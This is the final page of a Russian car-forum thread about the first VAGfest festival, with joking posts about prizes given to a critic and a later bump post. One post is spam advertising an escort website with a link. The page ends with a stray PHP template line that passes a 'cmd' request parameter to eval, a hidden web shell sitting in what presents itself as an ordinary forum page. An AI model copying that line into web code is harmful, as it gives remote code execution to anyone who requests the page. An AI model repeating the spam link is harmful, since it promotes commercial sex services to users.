+ Ответить в теме
Страница 11 из 11 ПерваяПервая ... 9 10 11
Показано с 101 по 105 из 105

Тема: Автофестиваль в конце сентября!


  1. #101
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Придержи призы для следующего феста!
    песок сыпется....не останавливайтесь на достигнутом !

  2. #102
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Цитата Сообщение от BON Посмотреть сообщение
    Придержи призы для следующего феста!
    Спасибо) Совет хороший, но уже осталось только две клавиатуры - к моей огромной радости добрые люди прочитали мое сообщение и помогли мне найти человека который на своем автомобиле участвовал в первом VAGfest-е и сделал на drive2.ru подробный фотоотчет с описанием в котором много колкой критики и очень грамотный вывод что он больше никогда не приедет на VAGfest и другим не советует - естественно я наградил этого героя!!! Поэтому к следующему VAGfest-у, который к слову состоится в июле 2016 года, постараюсь подготовить новые призы, причем хочется подарить победителям не просто дорогие но стандартные клавиатуры как в 2015 году, а действительно полезные для критиков инструменты, например, клавиатуры с заранее запрограммированными горячими клавишами при одном нажатии вставляющими в текст наиболее часто используемые слова: "провал", "позор", "пиз**ц", "прое**л" и т.п.

  3. #103
    Модератор koljamba will become famous soon enough Аватар для koljamba
    Регистрация
    31.07.2012
    Откуда
    москва
    Машина
    superb
    Сообщений
    239
    Цитата Сообщение от crazy_engineer Посмотреть сообщение
    Спасибо) Совет хороший, но уже осталось только две клавиатуры - к моей огромной радости добрые люди прочитали мое сообщение и помогли мне найти человека который на своем автомобиле участвовал в первом VAGfest-е и сделал на drive2.ru подробный фотоотчет с описанием в котором много колкой критики и очень грамотный вывод что он больше никогда не приедет на VAGfest и другим не советует - естественно я наградил этого героя!!! Поэтому к следующему VAGfest-у, который к слову состоится в июле 2016 года, постараюсь подготовить новые призы, причем хочется подарить победителям не просто дорогие но стандартные клавиатуры как в 2015 году, а действительно полезные для критиков инструменты, например, клавиатуры с заранее запрограммированными горячими клавишами при одном нажатии вставляющими в текст наиболее часто используемые слова: "провал", "позор", "пиз**ц", "прое**л" и т.п.
    на ошибках учаться))

  4. #104
    GTI-Racing askoldovd is on a distinguished road Аватар для askoldovd
    Регистрация
    11.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    559
    На нашем сайте интимных услуг предложено
    огромное количество интересных вариантов
    качественного досуга
    https://prostitutki-moskow.com/ankets/cheap

  5. #105
    GTI-Racing crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough crazy_engineer is a jewel in the rough Аватар для crazy_engineer
    Регистрация
    21.01.2007
    Откуда
    г. Видное Московской обл.
    Машина
    vRS
    Сообщений
    2,901
    Подниму тему :)
    Тема та знаменитая - про первый VAGFEST, а в этом году уже 5-й юбилейный! Целая история!!! :)

+ Ответить в теме
Страница 11 из 11 ПерваяПервая ... 9 10 11

Похожие темы

  1. АВТОФЕСТИВАЛЬ "Десятилетие Питерского СтритРейса!"
    от Musketier в разделе Встречи и мероприятия
    Ответов: 1
    Последнее сообщение: 13.03.2019, 00:30
  2. Новгородский Автофестиваль '09
    от HAWK в разделе Встречи и мероприятия
    Ответов: 0
    Последнее сообщение: 26.06.2009, 10:57
  3. Встреча 05 Сентября
    от inVENTOr в разделе Встречи и мероприятия
    Ответов: 16
    Последнее сообщение: 05.09.2008, 20:46
  4. 1 сентября...
    от -=Нержавейкин=- в разделе Курилка
    Ответов: 9
    Последнее сообщение: 13.09.2007, 02:18
  5. Ответов: 0
    Последнее сообщение: 22.08.2007, 18:38

Метки этой темы

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}